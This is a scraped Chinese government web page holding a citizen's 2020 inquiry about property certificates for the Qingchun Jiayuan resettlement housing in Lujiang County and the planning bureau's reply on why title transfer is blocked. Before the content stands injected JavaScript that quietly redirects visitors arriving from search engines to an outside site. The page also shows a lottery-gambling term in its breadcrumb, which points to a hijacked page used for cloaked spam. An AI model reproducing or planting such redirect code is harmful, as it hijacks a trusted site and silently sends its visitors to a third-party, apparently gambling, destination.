var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 咨询投诉

来信信息
信件编号: 23243252558715
信件类型: 我要咨询
来信标题: 安置房房产证
来信时间: 2020-01-05
来信内容:
你好,请问庐江县青春家园入住已有四五年了,什么时候可以办理房产证,青春家园可不可以,能不能办理房产证?
回复内容
答复单位: 庐江县自然资源和规划局
办理时间: 2020-01-09
回复内容:

王同志

您好。

您于202015日留言的信件收悉,经我局主要负责人批示,庐江县不动产登记中心鲍永龙副主任调查,现将办理情况答复如下:

您咨询的您想办理庐城镇青春家园不动产登记手续,经查,三里社区青春村民组留地安置供地手续已完成,但村民组未到我局申请办理首次登记。若您是安置户需整幢房屋办理首次登记后,才能办理转移登记,将不动产登记到您的名下;若您是购买安置户的房屋,由于该地块是留地安置,土地性质为划拨,根据目前的政策暂不能办理转移登记。202016日、7日、8日鲍永龙主任电话联系您本人,但是您没有接听电话,如有问题可以拨打下方咨询电话咨询。

感谢您对我们工作的关注和支持,欢迎再次来信(来电)。

咨询电话:87308323

     

庐江县自然资源和规划局

                              2020年1月9

 

 

 


留言评价
查询密码:
评价结果: